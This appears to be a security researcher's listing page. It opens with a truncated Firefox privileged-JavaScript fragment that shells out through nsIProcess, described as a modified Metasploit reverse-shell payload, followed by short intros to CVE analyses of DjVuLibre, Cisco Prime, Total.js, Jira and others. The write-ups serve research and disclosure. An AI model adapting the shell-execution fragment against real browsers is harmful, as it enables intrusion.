sinn3r atxsinn3r

// This should work on the latest version of Firefox
(function(){
var cmd = "echo test > /tmp/ph33r2.txt";
var shell;
var shEsc = "\\$&";
var shPath = "/bin/sh -c";
shell = shPath+" "+cmd.replace(/\W/g, shEsc);
//shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
// This is a modified Metasploit payload firefox/shell_reverse_tcp
// As of May 14 2020, the current version in Metasploit is extremely out of date.
// Based on my testing, it probably stopped working since 2017 or earlier.
// Originally the payload was created by Joe Vennix in 2014.
// This payload has only been tested on Windows.
// To test this, load it in the web console, but make sure devtools.chrome.enabled is on,
// which by default is enabled in some versions.
// Versions tested:
// 60.0 (32-bit)

CVE-2019-15142: DjVuLibre UTF8 Out-of-Bound Read Vulnerability

Description

DjVuLibre is an open source library for DjVu, a web-centric format and software platform for distributing documents and images. According to the official site, it is used by many academic, commercial, government, and non-commercial websites around the world.

A vulnerability was found by researcher Hongxu Chen. An out-of-bound read is possible when parsing a DjVu file, resulting in a denial-of-service condition.

Technical Details

Cisco Prime Infrastructure runrshell Local Privilege Escalation Vulnerability

Background

Cisco Prime Infrastructure (CPI) is a wired and wireless network management software suite that consists of different networking applications from Cisco Systems. The system is used across various industries, including healthcare, manufacturing, government and IT.

A vulnerability was found in the runrshell binary, which allows a local user to gain control in the context of root. It is also chained with other publicly known CPI remote exploits to get root in one shot, such as CVE-2018-15379 by Pedro Ribeiro and CVE-2019-1821 by Steven Seeley.

As of now, there appears to be no patch from Cisco.

CVE-2019-15954: Total.js CMS 12 Widget Remote Code Execution

Introduction

Total.js is a Node.js framework for building e-commerce applications, REST services, real-time apps, apps for the Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available and is used world-wide.

In Total.js CMS, a user with admin permission may create a widget to extend CMS functionality for visitors. However, this feature can also be abused to upload JavaScript code that is evaluated server side. As a result, it is possible to embed malicious JavaScript in a new widget and achieve remote code execution.

Technical Analysis

CVE-2018-14054: LibMP4v2 MP4StringProperty Handling Double Free Vulnerability

Introduction

LibMP4v2 is an open source MP4 processing library, designed to create and modify MP4 files as defined by ISO-IEC:14496-1:2001 MPEG-4 Systems.

Originally discovered by Ruikai Liu, a double free vulnerability exists in the MP4StringProperty code. While parsing MP4 atoms, it is possible to cause an MP4StringProperty's value to be freed twice because of the exception handling, resulting in a double free condition. Since this is library code that is not actively maintained, many third-party applications appear to be affected without a fix.

Technical Analysis

CVE-2018-18492: Mozilla Firefox Select Element Use-After-Free

Description

Firefox is a free and open-source web browser developed by the Mozilla Foundation.

A use-after-free vulnerability can occur after deleting a selection element, due to a weak reference to the select element in the options collection, which gets garbage collected and results in a potentially exploitable crash. It was originally discovered by Nils.

Vulnerable Version

CVE-2019-2557: Oracle Application Testing Suite DownloadServlet Directory Traversal Remote Code Execution

Background

Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.

In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before it is used to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.

This vuln

Jira Universal Plugin Manager PluginCollectionResource Class Upload Vulnerability

Jira is a Java application for bug tracking and agile project management, developed by Atlassian. According to Atlassian, Jira is used by over 75,000 customers in 122 countries. Some high-profile organizations include Fedora Commons, NASA, Skype Technologies, Twitter, the United States Department of Defense, etc.

The upload feature in the Universal Plugin Manager (UPM) allows a Jira user to upload a malicious plugin (add-on) and achieve remote code execution. This also implies that authentication is required.

Originally, an exploit module was submitted to Metasploit by Alex Gonzalez, and this is how our analysis started.

Vulnerable Application

CVE-2019-9692: CMS Made Simple (CMSMS) Showtime2 Post Auth Arbitrary File Upload Vulnerability

Background

CMS Made Simple (CMSMS) is an open source content management system. It can be used for various purposes such as galleries, company and user directories, guestbooks, e-commerce, blogs, etc., depending on the modules the user installs. It is written in PHP and runs on MySQL.

One of the commonly downloaded modules for CMSMS is Showtime2, a slideshow feature. Its watermark support allows an authenticated user (likely an administrator) to upload a watermark image, which can be abused to upload a malicious payload.

A Metasploit module was submitted on March 19th 2019, which allowed me to investigate the vulnerability.